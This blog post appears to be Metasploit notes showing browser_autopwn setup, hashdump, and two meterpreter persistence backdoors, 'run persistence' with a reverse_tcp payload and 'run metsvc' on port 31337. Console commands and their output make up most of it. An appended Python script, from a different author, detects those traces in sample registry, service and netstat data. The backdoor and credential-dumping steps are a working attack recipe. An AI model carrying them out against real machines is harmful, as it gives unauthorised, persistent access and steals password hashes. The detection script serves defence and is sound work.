  • search autopwn

    search autopwn

     
    use server/browser_autopwn
     
    show options
     
    set LHOST 
     
    set SRVPORT
     
    set URIPATH /
     
    show options
     
    Edit the etter.conf file:
    if you use ipchains
    if you use iptables
     
     
     
     
     
     
     
    After obtaining a session:
     
    run hashdump
     
    run persistence -X -i 5 -p 445 -r 192.168.1.106
     
     
    Metasploit: a couple of ways to set up a backdoor
     
    1. Scripts built into meterpreter
     
    Method 1. run persistence
     
    Use run persistence -h to see the available options:
     
    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
    [*] Running Persistance Script
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
    [*] Persistent agent script is 609496 bytes long
    [+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
    [+] Agent executed with PID 3272
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
    [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
    As you can see, the autostart is added through a registry key, and what it launches is the VBS script backdoor.
     
    Connecting:
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LHOST 192.168.1.139 
    LHOST => 192.168.1.139 
    msf  exploit(handler) > set LPORT 443 
    LPORT => 443 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler...
    It is not running by default; after the target machine reboots, a meterpreter shell is obtained successfully.
     
    Method 2. run metsvc
     
    Run the metsvc script:
     
    meterpreter > run metsvc -A
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
    [*]  >> Uploading metsrv.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
        * Installing service metsvc
        * Starting service
    Service metsvc successfully installed.
     
    [*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
    A new service is created and set to start automatically (image name metsvc.exe, service name metsvc). Connect to the backdoor:
     
    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/metsvc_bind_tcp 
    payload => windows/metsvc_bind_tcp 
    msf  exploit(handler) > set LPORT 31337 
    LPORT => 31337 
    msf  exploit(handler) > set RHOST 192.168.1.108 
    RHOST => 192.168.1.108 
    msf  exploit(handler) > exploit 
     
    [*] Started bind handler 
    [*] Starting the payload handler... 
     
    meterpreter >
    Connected successfully.
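    The two persistence mechanisms shown above leave very visible traces on the host: a value under HKCU\...\CurrentVersion\Run that launches a .vbs from C:\WINDOWS\TEMP, and an auto-start service whose binary lives under C:\WINDOWS\TEMP and listens on TCP 31337. The following Python is an added example, not code from the original post or from Metasploit: it runs simple detection logic over constructed sample data shaped like the output of `reg query`, a Name,PathName,StartMode service listing, and `netstat -ano`, all embedded inline. The host names, file names and PIDs in the samples are made up, and the watchlist port 4444 (Metasploit's default LPORT) is an assumption outside the page.

```python
import re
from typing import Dict, List

# Directories from which a legitimate autostart entry should essentially never run.
# Both mechanisms in the article drop their files under C:\WINDOWS\TEMP.
SUSPICIOUS_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\", "\\temp\\")
# Script interpreters are a common autostart vehicle; the article's agent is a .vbs.
SCRIPT_RE = re.compile(r"\.(?:vbs|js|bat|ps1|cmd)\b", re.IGNORECASE)
# Ports worth a closer look: 31337 is the metsvc default shown in the article,
# 4444 is Metasploit's default LPORT (assumption: tune this list to your estate).
WATCHLIST_PORTS = {"31337", "4444"}

# Constructed sample data (not captured from any real host).
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive        REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    FCBCUBtLrzFY    REG_SZ    C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
"""
SAMPLE_SERVICES = r"""
Name,PathName,StartMode
Spooler,C:\Windows\System32\spoolsv.exe,Auto
metsvc,C:\WINDOWS\TEMP\svcdir\metsvc.exe,Auto
"""
SAMPLE_NETSTAT = """
  TCP    0.0.0.0:135      0.0.0.0:0    LISTENING    892
  TCP    0.0.0.0:31337    0.0.0.0:0    LISTENING    3272
"""

RUN_VALUE_RE = re.compile(r"^\s*(?P<name>.+?)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$")
SERVICE_ROW_RE = re.compile(r"^\s*(?P<name>[^,]+),(?P<path>[^,]*),(?P<start>[^,]*)\s*$")
LISTENER_RE = re.compile(r"^\s*TCP\s+\S+:(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)")


def run_key_findings(reg_query_output: str) -> List[Dict[str, str]]:
    """Flag Run-key values that launch a script or anything from a temp directory."""
    findings = []
    for line in reg_query_output.splitlines():
        m = RUN_VALUE_RE.match(line)
        if not m:
            continue
        data = m.group("data")
        reasons = []
        if any(d in data.lower() for d in SUSPICIOUS_DIRS):
            reasons.append("launches from temp directory")
        if SCRIPT_RE.search(data):
            reasons.append("launches a script file")
        if reasons:
            findings.append({"source": "HKCU Run", "name": m.group("name"),
                             "data": data, "reason": "; ".join(reasons)})
    return findings


def service_findings(service_listing: str) -> List[Dict[str, str]]:
    """Flag services whose binary lives in a temp directory or carries the metsvc name."""
    findings = []
    for line in service_listing.splitlines():
        m = SERVICE_ROW_RE.match(line)
        if not m or m.group("name").strip().lower() == "name":  # skip the header row
            continue
        name, path, start = (m.group(g).strip() for g in ("name", "path", "start"))
        reasons = []
        if any(d in path.lower() for d in SUSPICIOUS_DIRS):
            reasons.append("binary in temp directory")
        if "metsvc" in name.lower() or "metsvc" in path.lower():
            reasons.append("matches metsvc service/binary name")
        if reasons and start.lower() == "auto":
            reasons.append("auto-start")
        if reasons:
            findings.append({"source": "service", "name": name,
                             "data": path, "reason": "; ".join(reasons)})
    return findings


def listener_findings(netstat_output: str) -> List[Dict[str, str]]:
    """Flag listening TCP ports on the watchlist (a bind-style backdoor must listen)."""
    findings = []
    for line in netstat_output.splitlines():
        m = LISTENER_RE.match(line)
        if m and m.group("port") in WATCHLIST_PORTS:
            findings.append({"source": "listener", "name": "pid " + m.group("pid"),
                             "data": "tcp/" + m.group("port"),
                             "reason": "watchlist port listening", "port": m.group("port")})
    return findings


def find_indicators(reg_query_output: str, service_listing: str, netstat_output: str):
    """Combine the three checks into one report."""
    return (run_key_findings(reg_query_output)
            + service_findings(service_listing)
            + listener_findings(netstat_output))


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_RUN_KEY, SAMPLE_SERVICES, SAMPLE_NETSTAT):
        print(f"[{f['source']}] {f['name']}: {f['data']} ({f['reason']})")
```

    On the sample data the script reports the FCBCUBtLrzFY Run value, the metsvc service and the listener on tcp/31337, and nothing for the benign OneDrive entry or the Spooler service. The temp-directory and script-extension rules are deliberately generic, since the file and value names are randomised on every run of the persistence script; the metsvc name match only catches an unrenamed service and is the weakest of the three checks.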
  • Original URL: https://www.cnblogs.com/journeyIT/p/8259946.html